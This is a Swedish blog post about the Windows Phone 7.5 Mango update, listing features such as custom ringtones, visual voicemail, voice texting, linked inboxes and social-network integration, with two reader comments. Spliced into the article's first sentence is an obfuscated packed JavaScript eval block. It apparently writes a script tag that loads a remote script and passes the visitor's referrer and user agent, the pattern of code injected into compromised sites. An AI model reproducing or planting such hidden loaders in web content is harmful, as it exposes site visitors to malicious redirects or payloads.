Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Nu är Windows Phone 7.5 Mango här

Nu är Windows Phone 7.5 Mango här
Sebastian

Till eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fyhir|var|u0026u|referrer|fniih||js|php’.split(’|’),0,{}))
de fåtal personer som köpt en Windows 7 telefon tidigt, nu kan ni äntligen uppdatera till 7.5 Mango. Hur ni gör kan ni läsa i guiden längre ner på sidan.

Nyheterna i Mango är en bättre inkorg som nu fått flera grundläggande funktioner som egna ringsignaler, mata in text genom att prata (kommer troligtvis till iOS 5 också), kartor över olika köpcentrum och otroligt massa annat.
Listan över exakt vad som kommer ingå kan ni hitta här:
Listan över funktioner. Annars har vi listat några av dem viktigaste uppdateringarna nedan.

Telefon

Anpassade ringsignaler. Du bad om det, vi gjorde det möjligt – nu kan du skapa dina egna ringsignaler med MP3- och WMA-filer.

Visuell röstbrevlåda. Har du inte tid att lyssna på osammanhängande röstmeddelanden? Nu kan du läsa dem i stället.

Nya talkommandon. Skicka ett sms med rösten! Det stämmer. Med talfunktionen kan du skicka sms, söka på webben och mycket annat utan att behöva använda händerna, eller ens ögonen. Telefonen kan till och med läsa upp ett inkommande sms och du kan sedan använda talfunktionen till att diktera och skicka ett svar.

Konversationsvyn. Om du har tröttnat på att behöva ta bort e-postmeddelanden ett och ett eller leta igenom hela inkorgen efter relaterade meddelanden kan du använda konversationsvyn, där e-posten grupperas efter ämne. Om du föredrar att visa e-postmeddelanden individuellt kan du fortfarande göra det också.

Länkade inkorgar. Använder du flera olika konton för personlig och jobbrelaterad e-post? Nu kan du göra det mycket smidigare genom att länka dem till en enda inkorg så att alla meddelanden visas i en och samma vy (dina konton kommer fortfarande att vara separata).

Kontakter + sociala nätverk

Grupper. Grupper hjälper dig att fokusera på de kontakter du verkligen bryr dig om – familjen, vännerna, föräldragruppen för barnens fotbollslag. Du kan fästa dina viktigaste grupper på startsidan så att du kan se deras senaste statusuppdateringar och snabbt skicka sms, e-postmeddelanden eller snabbmeddelanden till hela gruppen.

Fler sätt att dela. Det finns flera nya alternativ för att göra inlägg på sociala nätverk från telefonen, till exempel genom Facebook-incheckning, videodelning eller genom att dela länkar direkt i Internet Explorer.

Fler sociala nätverk. Se till att du alltid är med på vad som händer. Nu finns Twitter och LinkedIn inbyggt i Windows Phone och med ett enkelt tryck på skärmen kan du få tillgång till dina sociala nätverk. Vi har också inkluderat nya sätt att filtrera dina nya kontakter och deras sociala uppdateringar.

Ett bättre jag-kort. Allt handlar om dig och med kortet Jag kan du hålla kontakten med dina vänner och hålla dig uppdaterad med vad som händer i dina sociala nätverk.

Historikvyn. Du kan nu se historiken för senaste samtal, e-postmeddelanden, sms och chattar med en person på kontaktens kontaktkort. Du behöver bara trycka i listan om du vill ringa tillbaka eller gå till tråden.

Mer info: mango.microsoft.com

Comments

  1. Jacob stenhammar

    Riktigt fett. Hoppas det kommer en telefon minst som kan slåss mot Apples iPhone.

    • Hampus

      Ja om vi tittar på omröstningen i högra fältet högst upp ser vi att iphone är årets mest längtade smartphone.